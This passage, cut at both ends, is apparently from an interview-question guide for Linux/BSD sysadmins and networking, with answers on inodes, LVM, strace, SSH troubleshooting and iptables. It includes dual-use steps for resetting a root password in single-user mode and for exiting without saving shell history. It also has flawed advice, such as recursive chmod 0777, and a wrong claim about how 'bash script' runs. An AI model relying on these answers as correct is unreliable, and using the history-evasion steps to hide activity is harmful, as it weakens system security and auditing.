command to restart my computer?](https://unix.stackexchange.com/questions/434560/what-differences-it-will-make-if-i-use-telinit-6-instead-of-reboot-command) </details> <details> <summary><b>I have forgotten the root password! What do I do in BSD? What is the purpose of booting into single user mode?</b></summary><br> Restart the system, type `boot -s` at the `Boot:` prompt to enter **single-user mode**. At the question about the shell to use, hit `Enter` which will display a `#` prompt. Enter `mount -urw /` to remount the root file system read/write, then run `mount -a` to remount all the file systems. Run `passwd root` to change the root password then run `exit` to continue booting. **Single user mode** should basically let you log in with root access & change just about anything. For example, you might use single-user mode when you are restoring a damaged master database or a system database, or when you are changing server configuration options (e.g. password recovery). Useful resources: - [FreeBSD Reset or Recover Root Password](https://www.cyberciti.biz/tips/howto-freebsd-reset-recover-root-password.html) - [Single User Mode Definition](http://www.linfo.org/single_user_mode.html) </details> <details> <summary><b>How could you modify a text file without invoking a text editor?</b></summary><br> For example:<br> ```bash # cat >filename ... - overwrite file # cat >>filename ... - append to file cat > filename << __EOF__ data __EOF__ ``` </details> <details> <summary><b>How to change the kernel parameters? What kernel options might you need to tune? ***</b></summary><br> To set the kernel parameters in Unix-like, first edit the file `/etc/sysctl.conf` after making the changes save the file and run the command `sysctl -p`, this command will make the changes permanently without rebooting the machine. Useful resources: - [How to Change Kernel Runtime Parameters in a Persistent and Non-Persistent Way](https://www.tecmint.com/change-modify-linux-kernel-runtime-parameters/) </details> <details> <summary><b>Explain the <code>/proc</code> filesystem.</b></summary><br> `/proc` is a virtual file system that provides detailed information about kernel, hardware and running processes. Since `/proc` contains virtual files, it is called virtual file system. These virtual files have unique qualities. Most of them are listed as zero bytes in size. Virtual files such as `/proc/interrupts`, `/proc/meminfo`, `/proc/mounts` and `/proc/partitions` provide an up-to-the-moment glimpse of the system’s hardware. Others: `/proc/filesystems` file and the `/proc/sys/` directory provide system configuration information and interfaces. Useful resources: - [Linux Filesystem Hierarchy - /proc](https://www.tldp.org/LDP/Linux-Filesystem-Hierarchy/html/proc.html) </details> <details> <summary><b>Describe your data backup process. How often should you test your backups? ***</b></summary><br> To be completed. </details> <details> <summary><b>Explain three types of journaling in ext3/ext4.</b></summary><br> There are three types of journaling available in **ext3/ext4** file systems: - **Journal** - metadata and content are saved in the journal - **Ordered** - only metadata is saved in the journal. Metadata are journaled only after writing the content to disk. This is the default - **Writeback** - only metadata is saved in the journal. Metadata might be journaled either before or after the content is written to the disk </details> <details> <summary><b>What is an inode? How to find file's inode number and how can you use it?</b></summary><br> An **inode** is a data structure on a filesystem on Linux and other Unix-like operating systems that stores all the information about a file except its name and its actual data. A data structure is a way of storing data so that it can be used efficiently. A Unix file is stored in two different parts of the disk - the data blocks and the inodes. I won't get into superblocks and other esoteric information. The data blocks contain the "contents" of the file. The information about the file is stored elsewhere - in the inode. A file's inode number can easily be found by using the `ls` command, which by default lists the objects (i.e. files, links and directories) in the current directory (i.e. the directory in which the user is currently working), with its `-i` option. Thus, for example, the following will show the name of each object in the current directory together with its inode number: ```bash ls -i ``` `df's` `-i` option instructs it to supply information about inodes on each filesystem rather than about available space. Specifically, it tells df to return for each mounted filesystem the total number of inodes, the number of free inodes, the number of used inodes and the percentage of inodes used. This option can be used together with the `-h` option as follows to make the output easier to read: ```bash df -hi ``` **Finding files by inodes** If you know the inode, you can find it using the find command: ```bash find . -inum 435304 -print ``` **Deleting files with strange names** Sometimes files are created with strange characters in the filename. The Unix file system will allow any character as part of a filename except for a null (ASCII 000) or a "/". Every other character is allowed. Users can create files with characters that make it difficult to see the directory or file. They can create the directory ".. " with a space at the end, or create a file that has a backspace in the name, using: ```bash touch `printf "aa\bb"` ``` Now what what happens when you use the `ls` command: ```bash ls aa?b ls | grep 'a' ab ``` Note that when `ls` sends the result to a terminal, it places a "**?**" in the filename to show an unprintable character. You can get rid of this file by using `rm -i *` and it will prompt you before it deletes each file. But you can also use `find` to remove the file, once you know the inode number. ```bash ls -i 435304 aa?b find . -inum 435304 -delete ``` Useful resources: - [Understand UNIX/Linux Inodes Basics with Examples](https://www.thegeekstuff.com/2012/01/linux-inodes/) - [What is an inode as defined by POSIX?](https://unix.stackexchange.com/questions/387087/what-is-an-inode-as-defined-by-posix/387093) </details> <details> <summary><b><code>ls -l</code> shows file attributes as question marks. What this means and what steps will you take to remove unused "zombie" files?</b></summary><br> This problem may be more difficult to solve because several steps may be required - sometimes you have get `test/file: Permission denied`, `test/file: No such file or directory` or `test/file: Input/output error`. That happens when the user can't do a `stat()` on the files (which requires execute permissions), but can read the directory entries (which requires read access on the directory). So you get a list of files in the directory, but can't get any information on the files because they can't be read. If you have a directory which has read permission but not execute, you'll see this. Some processes like a `rsync` generates temporary files that get created and dropped fast which will cause errors if you try to call other simple file management commands like `rm`, `mv` etc. Example of output: ```bash ?????????? ? ? ? ? ? sess_kee6fu9ag7tiph2jae ``` 1) change permissions: `chmod 0777 sess_kee6fu9ag7tiph2jae` and try remove 2) change owner: `chown root:root sess_kee6fu9ag7tiph2jae` and try remove 3) change permissions and owner for directory: `chmod -R 0777 dir/ && chown -R root:root dir/` and try remove 4) recreate file: `touch sess_kee6fu9ag7tiph2jae` and try remove 5) watch out for other running processes on the server for example `rsync`, sometimes you can see this as a transient error when an NFS server is heavily overloaded 6) find file inode: `ls -i`, and try remove: `find . -inum <inode_num> -delete` 7) remount (if possible) your filesystem 8) boot system into single-user mode and repair your filesystem with `fsck` Useful resources: - [Question marks showing in ls of directory. IO errors too.](https://serverfault.com/questions/65616/question-marks-showing-in-ls-of-directory-io-errors-too) </details> <details> <summary><b>To LVM or not to LVM. What benefits does it provide?</b></summary><br> - LVM makes it quite easy to move file systems around - you can extend a volume group onto a new physical volume - move any number of logical volumes of an old physical one - remove that volume from the volume group without needing to unmount any partitions - you can also make snapshots of logical volumes for making backups - LVM has built in mirroring support so you can have a logical volume mirrored across multiple physical volumes - LVM even supports TRIM Useful resources: - [What is LVM and what is it used for?](https://askubuntu.com/questions/3596/what-is-lvm-and-what-is-it-used-for) </details> <details> <summary><b>How to increase the size of LVM partition?</b></summary><br> Use the `lvextend` command for resize LVM partition. - extending the size by 500MB: ```bash lvextend -L +500M /dev/vgroup/lvolume ``` - extending all available free space: ```bash lvextend -l +100%FREE /dev/vgroup/lvolume ``` and `resize2fs` or `xfs_growfs` to resize filesystem: - for ext filesystems: ```bash resize2fs /dev/vgroup/lvolume ``` - for xfs filesystem: ```bash xfs_growfs mountpoint_for_/dev/vgroup/lvolume ``` Useful resources: - [Extending a logical volume](https://www.tldp.org/HOWTO/LVM-HOWTO/extendlv.html) </details> <details> <summary><b>What is a zombie/defunct process?</b></summary><br> Is a process that has completed execution (via the `exit` system call) but still has an entry in the process table: it is a process in the "**Terminated state**". Processes marked **defunct** are dead processes (so-called "zombies") that remain because their parent has not destroyed them properly. These processes will be destroyed by init if the parent process exits. Useful resources: - [What is a <defunct> process, and why doesn't it get killed?](https://askubuntu.com/questions/201303/what-is-a-defunct-process-and-why-doesnt-it-get-killed) </details> <details> <summary><b>What is the proper way to upgrade/update a system in production? Do you automate these processes? Do you set downtime for them? Write recommendations. ***</b></summary><br> To be completed. </details> <details> <summary><b>Your friend during configuration of the MySQL server asked you: <i>Should I run <code>sudo mysql_secure_installation</code> after installing mysql?</i> What do you think about it? </b></summary><br> It would be better if you run command as it provides many security options like: - You can set a password for root accounts - You can remove root accounts that are accessible from outside the local host - You can remove anonymous-user accounts - You can remove the test database, which by default can be accessed by anonymous users Useful resources: - [What is Purpose of using mysql_secure_installation?](https://stackoverflow.com/questions/20760908/what-is-purpose-of-using-mysql-secure-installation) </details> <details> <summary><b>Present and explain the good ways of using the <code>kill</code> command.</b></summary><br> Speaking of killing processes never use `kill -9/SIGKILL` unless absolutely mandatory. This kill can cause problems because of its brute force. Always try to use the following simple procedure: - first, send **SIGTERM** (`kill -15`) signal first which tells the process to shutdown and is generally accepted as the signal to use when shutting down cleanly (but remember that this signal can be ignored). - next try to send **SIGHUP** (`kill -1`) signal which is commonly used to tell a process to shutdown and restart, this signal can also be caught and ignored by a process. The far majority of the time, this is all you need - and is much cleaner. Useful resources: - [When should I not kill -9 a process?](https://unix.stackexchange.com/questions/8916/when-should-i-not-kill-9-a-process) - [SIGTERM vs. SIGKILL](https://major.io/2010/03/18/sigterm-vs-sigkill/) </details> <details> <summary><b>What is <code>strace</code> command and how should be used? Explain example of connect to an already running process.</b></summary><br> `strace` is a powerful command line tool for debugging and troubleshooting programs in Unix-like operating systems such as Linux. It captures and records all system calls made by a process and the signals received by the process. **Strace Overview** `strace` can be seen as a light weight debugger. It allows a programmer/user to quickly find out how a program is interacting with the OS. It does this by monitoring system calls and signals. **Uses** Good for when you don't have source code or don't want to be bothered to really go through it. Also, useful for your own code if you don't feel like opening up **GDB**, but are just interested in understanding external interaction. **Example of attach to the process** `strace -p <PID>` - to attach a process to strace. `strace -e trace=read,write -p <PID>` - by this you can also trace a process/program for an event, like read and write (in this example). So here it will print all such events that include read and write system calls by the process. Other such examples - `-e trace=network` - trace all the network related system calls. - `-e trace=signal` - trace all signal related system calls. - `-e trace=ipc` - trace all IPC related system calls. - `-e trace=desc` - trace all file descriptor related system calls. - `-e trace=memory` - trace all memory mapping related system calls. Useful resources: - [How should strace be used? (original)](https://stackoverflow.com/questions/174942/how-should-strace-be-used) - [How does strace connect to an already running process? (original)](https://stackoverflow.com/questions/7482076/how-does-strace-connect-to-an-already-running-process) - [strace: for fun, profit, and debugging](http://timetobleed.com/hello-world/) </details> <details> <summary><b>When would you use access control lists instead of or in conjunction with the <code>chmod</code> command? ***</b></summary><br> To be completed. </details> <details> <summary><b>Which algorithms are supported in <code>/etc/shadow</code> file?</b></summary><br> Typical current algorithms are: - MD5 - SHA-1 (also called SHA) both should not be used for cryptographic/security purposes any more!! - SHA-256 - SHA-512 - SHA-3 (KECCAK was announced the winner in the competition for a new federal approved hash algorithm in October 2012) Useful resources: - [What is the algorithm used to encrypt Linux passwords?](https://crypto.stackexchange.com/questions/40841/what-is-the-algorithm-used-to-encrypt-linux-passwords) - [How to find the hashing algorithm used to obfuscate passwords?](https://unix.stackexchange.com/questions/430141/how-to-find-the-hashing-algorithm-used-to-obfuscate-passwords) </details> <details> <summary><b>What is the use of ulimit in Unix-like systems?</b></summary><br> Most Unix-like operating systems, including Linux and BSD, provide ways to limit and control the usage of system resources such as threads, files, and network connections on a per-process and per-user basis. These "**ulimits**" prevent single users from using too many system resources. </details> <details> <summary><b>What are soft limits and hard limits?</b></summary><br> **Hard limit** is the maximum allowed to a user, set by the superuser or root. This value is set in the file `/etc/security/limits.conf`. The user can increase the **soft limit** on their own in times of needing more resources, but cannot set the **soft limit** higher than the **hard limit**. </details> <details> <summary><b>During configuration HAProxy to working with Redis you get <code>General socket error (Permission denied)</code> from log. SELinux is enable. Explain basic SELinux troubleshooting in CLI. ***</b></summary><br> Useful resources: - [Basic SELinux Troubleshooting in CLI](https://access.redhat.com/articles/2191331) </details> <details> <summary><b>You have configured an RSA key login but your server show <code>Server refused our key</code> as expected. Where will you look for the cause of the problem?</b></summary><br> **Server side** Setting `LogLevel VERBOSE` in file `/etc/ssh/sshd_config` is probably what you need, although there are higher levels: SSH auth failures are logged in `/var/log/auth.log`, `/var/log/secure` or `/var/log/audit/audit.log`. The following should give you only ssh related log lines (for example): ```bash grep 'sshd' /var/log/auth.log ``` Next, the most simple command to list all failed SSH logins is the one shown below: ```bash grep "Failed password" /var/log/auth.log ``` also useful is: ```bash grep "Failed\|Failure" /var/log/auth.log ``` On newer Linux distributions you can query the runtime log file maintained by Systemd daemon via `journalctl` command (`ssh.service` or `sshd.service`). For example: ```bash journalctl _SYSTEMD_UNIT=ssh.service | egrep "Failed|Failure" ``` **Client side** Also you should run SSH client with `-v|--verbose` - it is in first level of verbosity. Next, you can enable additional (level 2 and 3) verbosity for even more debugging messages as shown with e.g. `-vv`. Useful resources: - [Enable Debugging Mode in SSH to Troubleshoot Connectivity Issues](https://www.tecmint.com/enable-debugging-mode-in-ssh/) </details> <details> <summary><b>Why do most distros use ext4, as opposed to XFS or other filesystems? Why are there so many of them? ***</b></summary><br> To be completed. </details> <details> <summary><b>A project manager needs a new SQL Server. What do you ask her/his? ***</b></summary><br> I want the DBA to ask questions like: - How big will the database be? (whether we can add the database to an existing server) - How critical is the database? (about clustering, disaster recovery, high availability) </details> <details> <summary><b>Create a file with 100 lines with random values.</b></summary><br> For example: ```bash cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 100 > /path/to/file ``` </details> <details> <summary><b>How to run script as another user without password?</b></summary><br> For example (with `visudo` command): ```bash user1 ALL=(user2) NOPASSWD: /opt/scripts/bin/generate.sh ``` The command paths must be absolute! Then call `sudo -u user2 /opt/scripts/bin/generate.sh` from a user1 shell. </details> <details> <summary><b>How to check if running as root in a bash script? What should you watch out for?</b></summary><br> In a bash script, you have several ways to check if the running user is root. As a warning, do not check if a user is root by using the root username. Nothing guarantees that the user with ID 0 is called root. It's a very strong convention that is broadly followed but anybody could rename the superuser another name. I think the best way when using bash is to use `$EUID` because `$UID` could be changed and not reflect the real user running the script. ```bash if (( $EUID != 0 )); then echo "Please run as root" exit fi ``` </details> <details> <summary><b>Can you give a particular example when is indicated to use <code>nobody</code> account? Tell me the differences running httpd service as a <code>nobody</code> and <code>www-data</code> accounts.</b></summary><br> In many Unix variants, `nobody` is the conventional name of a user account which owns no files, is in no privileged groups, and has no abilities except those which every other user has. It is common to run daemons as `nobody`, especially servers, in order to limit the damage that could be done by a malicious user who gained control of them. However, the usefulness of this technique is reduced if more than one daemon is run like this, because then gaining control of one daemon would provide control of them all. The reason is that `nobody`-owned processes have the ability to send signals to each other and even debug each other, allowing them to read or even modify each other's memory. **When should I use `nobody` account?** When permissions aren't required for a program's operations. This is most notable when there isn't ever going to be any disk activity. A real world example of this is **memcached** (a key-value in-memory cache/database/thing), sitting on my computer and my server running under the `nobody` account. Why? Because it just doesn't need any permissions and to give it an account that did have write access to files would just be a needless risk. A good example are also web servers. Imagine if Apache ran as root and someone found a way to send custom commands to the console through Apache would have access to your entire system. `nobody` account also is used as a restricted shell for giving users filesystem access without an actual shell like bash. This should prevent them from being able to execute things. **`nobody` or `www-data` for httpd (Apache)** Upon starting Apache needs root access, but it quickly drops this and assumes the identity of a non privileged user. This user can either be `nobody` or `apache`, or `www-data`. Several applications use the user `nobody` as a default. For example you probably never really want say the Apache service to be overwriting files that belong to bind. Having a per-service account tends to be a very good idea. Getting Apache to run as `nobody:nobody` is pretty easy, just update the user and group settings. But as I mentioned above I don't really recommend that particular user/group. It is entirely possible that you may be tempted to add a service to the system at some time in the future that also runs as `nobody`, and you will forget that have given write access on the filesystem to the user `nobody`. If somehow, `nobody` were to become compromised they could potentially have more impact than if an application isolate user, such as `www-data`. Of course a lot of this will depend on the file and group permissions. `nobody` uses the permissions of others, while an application specific user could be configured to allow file read access, but other could still be denied. Useful resources: - [What is nobody user and group?](https://unix.stackexchange.com/questions/186568/what-is-nobody-user-and-group) - [The Linux and Unix Nobody User](http://linuxg.net/the-linux-and-unix-nobody-user/) - [What is the purpose of the 'nobody' user?](https://askubuntu.com/questions/329714/what-is-the-purpose-of-the-nobody-user) </details> <details> <summary><b>Is there a way to redirect output to a file and have it display on stdout?</b></summary><br> The command you want is named tee: `foo | tee output.file` For example, if you only care about stdout: `ls -a | tee output.file` If you want to include stderr, do: `program [arguments...] 2>&1 | tee outfile` `2>&1` redirects channel 2 (stderr/standard error) into channel 1 (stdout/standard output), such that both is written as stdout. It is also directed to the given output file as of the tee command. Furthermore, if you want to append to the log file, use `tee -a` as: `program [arguments...] 2>&1 | tee -a outfile` </details> <details> <summary><b>What is the preferred bash shebang and why? What is the difference between executing a file using <code>./script</code> or <code>bash script</code>?</b></summary><br> You should use `#!/usr/bin/env bash` for portability: different \*nixes put bash in different places, and using `/usr/bin/env` is a workaround to run the first bash found on the `PATH`. Running `./script` does exactly that, and requires execute permission on the file, but is agnostic to what type of a program it is. It might be a **bash script**, an **sh script**, or a **Perl**, **Python**, **awk**, or **expect script**, or an actual **binary executable**. Running `bash script` would force it to be run under `sh`, instead of anything else. Useful resources: - [What is the preferred Bash shebang? (original)](https://stackoverflow.com/questions/10376206/what-is-the-preferred-bash-shebang) </details> <details> <summary><b>You must run command that will be performed for a very long time. How to prevent killing this process after the ssh session drops?</b></summary><br> Use `nohup` to make your process ignore the hangup signal: ```bash nohup long-running-process & exit ``` or you want to be using **GNU Screen**: ```bash screen -d -m long-running-process exit ``` Useful resources: - [5 Ways to Keep Remote SSH Sessions and Processes Running After Disconnection](https://www.tecmint.com/keep-remote-ssh-sessions-running-after-disconnection/) </details> <details> <summary><b>What is the main purpose of the intermediate certification authorities?</b></summary><br> To find out the main purpose of an intermediate CA, you should first learn about **Root CAs**, **Intermediate CAs**, and the **SSL Certificate Chain Trust**. **Root CAs** are primary CAs which typically don’t directly sign end entity/server certificates. They issue Root certificates which are usually pre-installed within all browsers, mobiles, and applications. The private key of these certificates is used to sign other subsequent certificates called intermediate certificates. Root CAs are usually kept "offline” and in a highly secure environment with stringently limited access. **Intermediates CAs** are CAs that subordinate to the Root CA by one or more levels, being trusted by these to sign certificates on their behalf. The purpose of creating and using Intermediate CAs is primarily for security because if the intermediate private key is compromised, then the Root CA can revoke the intermediate certificate and create a new one with a new cryptographic key pair. **SSL Certificate Chain Trust** is the list of SSL certificates, from the root certificate to the end entity/server certificate. For an SSL Certificate to be trusted, it must be issued by a trusted CAs which is included in the trusted CA list of the connecting device (browser, mobile, and application). Therefore, the connecting device will test the trustworthiness of each SSL Certificate in the Chain Trust until it matches the one issued by a trusted CA. The **Root-Intermediate CA** structure is created by each major CA to protect against the disastrous effects of a root key compromise. If a root key is compromised, it would render the root and all subordinated certificates untrustworthy. For this reason, creating an Intermediate CA is a best practice to ensure a rigorous protection of the primary root key. Useful resources: - [How certificate chains work](https://knowledge.digicert.com/solution/SO16297.html) </details> <details> <summary><b>How to reload PostgreSQL after configuration changes?</b></summary><br> Solution 1: ```bash systemctl reload postgresql ``` Solution 2: ``` su - postgres /usr/bin/pg_ctl reload ``` Solution 3: ``` SELECT pg_reload_conf(); ``` </details> <details> <summary><b>You have added several aliases to <code>.profile</code>. How to reload shell without exit?</b></summary><br> The best way is `exec $SHELL -l` because `exec` replaces the current process with a new one. Also good (but other) solution is `. ~/.profile`. Useful resources: - [How to reload .bash_profile from the command line?](https://stackoverflow.com/questions/4608187/how-to-reload-bash-profile-from-the-command-line) </details> <details> <summary><b>How to exit without saving shell history?</b></summary><br> ```bash kill -9 $$ ``` or ```bash unset HISTFILE && exit ``` Useful resources: - [How do I close a terminal without saving the history?](https://unix.stackexchange.com/questions/25049/how-do-i-close-a-terminal-without-saving-the-history) </details> <details> <summary><b>What is this UID 0 toor account? Have I been compromised?</b></summary><br> **toor** is an alternative superuser account, where toor is root spelled backwards. It is intended to be used with a non-standard shell so the default shell for root does not need to change. This is important as shells which are not part of the base distribution, but are instead installed from ports or packages, are installed in `/usr/local/bin` which, by default, resides on a different file system. If root's shell is located in `/usr/local/bin` and the file system containing `/usr/local/bin`) is not mounted, root will not be able to log in to fix a problem and will have to reboot into single-user mode in order to enter the path to a shell. Some people use toor for day-to-day root tasks with a non-standard shell, leaving root, with a standard shell, for single-user mode or emergencies. By default, a user cannot log in using toor as it does not have a password, so log in as root and set a password for toor before using it to login. Useful resources: - [The root account (and toor)](https://administratosphere.wordpress.com/2007/10/04/the-root-account-and-toor/) </details> <details> <summary><b>Is there an easy way to search inside 1000s of files in a complex directory structure to find files which contain a specific string?</b></summary><br> For example use `fgrep`: ```bash fgrep * -R "string" ``` or: ```bash grep -insr "pattern" * ``` - `-i` ignore case distinctions in both the **PATTERN** and the input files - `-n` prefix each line of output with the 1-based line number within its input file - `-s` suppress error messages about nonexistent or unreadable files. - `-r` read all files under each directory, recursively. Useful resources: - [How to grep a string in a directory and all its subdirectories files in LINUX?](https://stackoverflow.com/questions/15622328/how-to-grep-a-string-in-a-directory-and-all-its-subdirectories-files-in-linux) </details> <details> <summary><b>How to find out the dynamic libraries executables loads when run?</b></summary><br> You can do this with `ldd` command: ```bash ldd /bin/ls ``` </details> <details> <summary><b>You have the task of sync the testing and production environments. What steps will you take?</b></summary><br> It's easy to get dragged down into bikeshedding about cloning environments and miss the real point: - only production is production and every time you deploy there you are testing a unique combination of deploy code + software + environment. Every once in a while a good solution is regular cloning of the production servers to create testing servers. You can create instances with an exact copy of your production environment under a dev/test with snapshots, for example: - generate a snapshot of production - copy the snapshot to staging (or other) - create a new disk using this snapshot Sure, you can spin up clones of various system components or entire systems, and capture real traffic to replay offline (the gold standard of systems testing). But many systems are too big, complex, and cost-prohibitive to clone. Before environment synchronization a good way is keeping track of every change that you make to the testing environment and provide a way for propagating this to the production environment, so that you do not skip any step and do it as smoothly as possible. Also structure comparison tool or deploy scripts that update the testing environment from production environment is a good solution. **Presync tasks** First of all is informing developers and clients about not making changes on the test environment (if possible, disabling test domains that target this environment or set static pages with information about synchronization). It is also important to make backup/snapshots of both environments. **Database servers** - sync/update system version (e.g. packages) - create dump file from database on production db server - import dump file on testing db server - if necessary, syncs login permissions, roles, database permissions, open connections to the database and other **Web/App servers** - sync/update system version (e.g. packages) - if necessary, updated kernel parameters, firewall rules and other - sync/update configuration files of all running/important services - sync/update user accounts (e.g. permissions) and their home directories - deploy project from git/svn repository - sync/update important directories existing in project, e.g. **static**, **asset** and other - sync/update permissions for project directory - remove/update all webhooks - update cron jobs **Others tasks** - updated configurations of load balancers for testing domains and specific urls - updated configurations of queues, session and storage instances Useful resources: - [Keeping testing and production server environments clean, in sync, and consistent](https://stackoverflow.com/questions/639668/keeping-testing-and-production-server-environments-clean-in-sync-and-consisten) </details> ###### Network Questions (24) <details> <summary><b>Configure a virtual interface on your workstation. ***</b></summary><br> To be completed. </details> <details> <summary><b>According to an HTTP monitor, a website is down. You're able to telnet to the port, so how do you resolve it?</b></summary><br> If you can telnet to the port, this means that the service listening on the port is running and you can connect to it (it's not a networking problem). It is good to check this way for the IP address to which the domain is resolved and using the same domain to test connection. First of all check if your site is online from a other location. It then lets you know if the site is down everywhere, or if only your network is unable to view it. It is also a good idea to check what the web browser returns. **If only IP connection working** - you can use whois to see what DNS servers serve up the hostname to the site: `whois www.example.com` - you can use tools like `dig` or `host` to test DNS to see if the host name is resolving: `host www.example.org dns.example.org` - you can also check global public dns servers: `host www.example.com 9.9.9.9` If domain not resolved it's probably problem with DNS servers. **If domain resolved properly** - investigate the log files and resolve the issue regarding to the logs, it's the best way to show what's wrong - check the http status code, usually it will be the response with the 5xx, maybe server is overload because clients making lot's of connection to the website or specific url? maybe your caching rules not working properly? - check web/proxy server configuration (e.g. `nginx -t -c </path/to/nginx.conf>`), maybe another sysadmin has made some changes to the domain configuration? - maybe something on the server has crashed? maybe run out of space or run out of memory? - maybe it's a programming error on the website? </details> <details> <summary><b>Load balancing can dramatically impact server performance. Discuss several load balancing mechanisms. ***</b></summary><br> To be completed. </details> <details> <summary><b>List examples of network troubleshooting tools that can degrade during DNS issues. ***</b></summary><br> To be completed. </details> <details> <summary><b>Explain difference between HTTP 1.1 and HTTP 2.0.</b></summary><br> <b>HTTP/2</b> supports queries multiplexing, headers compression, priority and more intelligent packet streaming management. This results in reduced latency and accelerates content download on modern web pages. Key differences with **HTTP/1.1**: - it is binary, instead of textual - fully multiplexed, instead of ordered and blocking - can therefore use one connection for parallelism - uses header compression to reduce overhead - allows servers to "push" responses proactively into client caches Useful resources: - [What is HTTP/2 - The Ultimate Guide](https://kinsta.com/learn/what-is-http2/) </details> <details> <summary><b>Dev team reports an error: <code>POST http://ws.int/api/v1/Submit/ resulted in a 413 Request Entity Too Large</code>. What's wrong?</b></summary><br> **Modify NGINX configuration file for domain** Set correct `client_max_body_size` variable value: ```bash client_max_body_size 20M; ``` Restart Nginx to apply the changes. **Modify php.ini file for upload limits** It’s not needed on all configurations, but you may also have to modify the PHP upload settings as well to ensure that nothing is going out of limit by php configurations. Now find following directives one by one: ```bash upload_max_filesize post_max_size ``` and increase its limit to 20M, by default they are 8M and 2M: ```bash upload_max_filesize = 20M post_max_size = 20M ``` Finally save it and restart PHP. Useful resources: - [413 Request Entity Too Large in Nginx with client_max_body_size set](https://serverfault.com/questions/814767/413-request-entity-too-large-in-nginx-with-client-max-body-size-set) </details> <details> <summary><b>What is handshake mechanism and why do we need 3 way handshake?</b></summary><br> **Handshaking** begins when one device sends a message to another device indicating that it wants to establish a communications channel. The two devices then send several messages back and forth that enable them to agree on a communications protocol. A **three-way handshake** is a method used in a TCP/IP network to create a connection between a local host/client and server. It is a three-step method that requires both the client and server to exchange `SYN` and `ACK` (`SYN`, `SYN-ACK`, `ACK`) packets before actual data communication begins. Useful resources: - [Why do we need a 3-way handshake? Why not just 2-way?](https://networkengineering.stackexchange.com/questions/24068/why-do-we-need-a-3-way-handshake-why-not-just-2-way) </details> <details> <summary><b>Why is UDP faster than TCP?</b></summary><br> **UDP** is faster than **TCP**, and the simple reason is because its nonexistent acknowledge packet (`ACK`) that permits a continuous packet stream, instead of TCP that acknowledges a set of packets, calculated by using the TCP window size and round-trip time (`RTT`). Useful resources: - [UDP vs TCP, how much faster is it?](https://stackoverflow.com/questions/47903/udp-vs-tcp-how-much-faster-is-it) </details> <details> <summary><b>Which, in your opinion, are the 5 most important OpenSSH parameters that improve the security? ***</b></summary><br> To be completed. Useful resources: - [OpenSSH security and hardening](https://linux-audit.com/audit-and-harden-your-ssh-configuration/) </details> <details> <summary><b>What is NAT? What is it used for?</b></summary><br> It enables private IP networks that use unregistered IP addresses to connect to the Internet. **NAT** operates on a router, usually connecting two networks together, and translates the private (not globally unique) addresses in the internal network into legal addresses, before packets are forwarded to another network. Workstations or other computers requiring special access outside the network can be assigned specific external IPs using **NAT**, allowing them to communicate with computers and applications that require a unique public IP address. **NAT** is also a very important aspect of firewall security. Useful resources: - [Network Address Translation (NAT) Concepts](http://www.firewall.cx/networking-topics/network-address-translation-nat/227-nat-concepts.html) </details> <details> <summary><b>What is the purpose of Spanning Tree?</b></summary><br> This protocol operates at layer 2 of the OSI model with the purpose of preventing loops on the network. Without **STP**, a redundant switch deployment would create broadcast storms that cripple even the most robust networks. There are several iterations based on the original IEEE 802.1D standard; each operates slightly different than the others while largely accomplishing the same loop-free goal. </details> <details> <summary><b>How to check which ports are listening on my Linux Server?</b></summary><br> Use the: - `lsof -i` - `ss -l` - `netstat -atn` - for tcp - `netstat -aun` - for udp - `netstat -tulapn` </details> <details> <summary><b>What mean <code>Host key verification failed</code> when you connect to the remote host? Do you accept it automatically?</b></summary><br> `Host key verification failed` means that the host key of the remote host was changed. This can easily happen when connecting to a computer who's host keys in `/etc/ssh` have changed if that computer was upgraded without copying its old host keys. The host keys here are proof when you reconnect to a remote computer with ssh that you are talking to the same computer you connected to the first time you accessed it. Whenever you connect to a server via SSH, that server's public key is stored in your home directory (or possibly in your local account settings if using a Mac or Windows desktop) file called **known_hosts**. When you reconnect to the same server, the SSH connection will verify the current public key matches the one you have saved in your **known_hosts** file. If the server's key has changed since the last time you connected to it, you will receive the above error. Don't delete the entire **known_hosts** file as recommended by some people, this totally voids the point of the warning. It's a security feature to warn you that a man in the middle attack may have happened. Before accepting the new host key, contact your/other system administrator for verification. Useful resources: - [Git error: "Host Key Verification Failed" when connecting to remote repository](https://stackoverflow.com/questions/13363553/git-error-host-key-verification-failed-when-connecting-to-remote-repository) </details> <details> <summary><b>How to send an HTTP request using <code>telnet</code>?</b></summary><br> For example: ```bash telnet example.com 80 Trying 192.168.252.10... Connected to example.com. Escape character is '^]'. GET /questions HTTP/1.0 Host: example.com HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 ... ``` </details> <details> <summary><b>How do you kill program using e.g. 80 port in Linux?</b></summary><br> To list any process listening to the port 80: ```bash # with lsof lsof -i:80 # with fuser fuser 80/tcp ``` To kill any process listening to the port 80: ```bash kill $(lsof -t -i:80) ``` or more violently: ```bash kill -9 $(lsof -t -i:80) ``` or with `fuser` command: ```bash fuser -k 80/tcp ``` Useful resources: - [How to kill a process running on particular port in Linux?](https://stackoverflow.com/questions/11583562/how-to-kill-a-process-running-on-particular-port-in-linux/32592965) - [Finding the PID of the process using a specific port?](https://unix.stackexchange.com/questions/106561/finding-the-pid-of-the-process-using-a-specific-port) </details> <details> <summary><b>You get <code>curl: (56) TCP connection reset by peer</code>. What steps will you take to solve this problem?</b></summary><br> - check if the URL is correct, maybe you should add `www` or set correctly `Host:` header? Check also scheme (http or https) - check the domain is resolving into a correct IP address - enable debug tracing with `--trace-ascii curl.dump`. `Recv failure` is a really generic error so its hard for more info - use external proxy with `--proxy` for debug connection from external ip - use network sniffer (e.g. `tcpdump`) for debug connection in the lower TCP/IP layers - check firewall rules on the production environment and on the exit point of your network, also check your NAT rules - check MTU size of packets traveling over your network - check SSL version with ssl/tls `curl` params if you connecting to https protocol - it may be a problem on the client side e.g. the netfilter drop or limit connections from your IP address to the domain Useful resources: - [CURL ERROR: Recv failure: Connection reset by peer - PHP Curl](https://stackoverflow.com/questions/10285700/curl-error-recv-failure-connection-reset-by-peer-php-curl) </details> <details> <summary><b>How to allow traffic to/from specific IP with iptables?</b></summary><br> For example: ```bash /sbin/iptables -A INPUT -p tcp -s XXX.XXX.XXX.XXX -j ACCEPT /sbin/iptables -A OUTPUT -p tcp -d XXX.XXX.XXX.XXX -j ACCEPT ``` </details> <details> <summary><b>How to block abusive IP addresses with <code>pf</code> in OpenBSD?</b></summary><br> The best way to do this is to define a table and create a rule to block the hosts, in `pf.conf`: ```bash table <badhosts> persist block on fxp0 from <badhosts> to any ``` And then dynamically add/delete IP addresses from it: ```bash pfctl -t badhosts -T add 1.2.3.4 pfctl -t 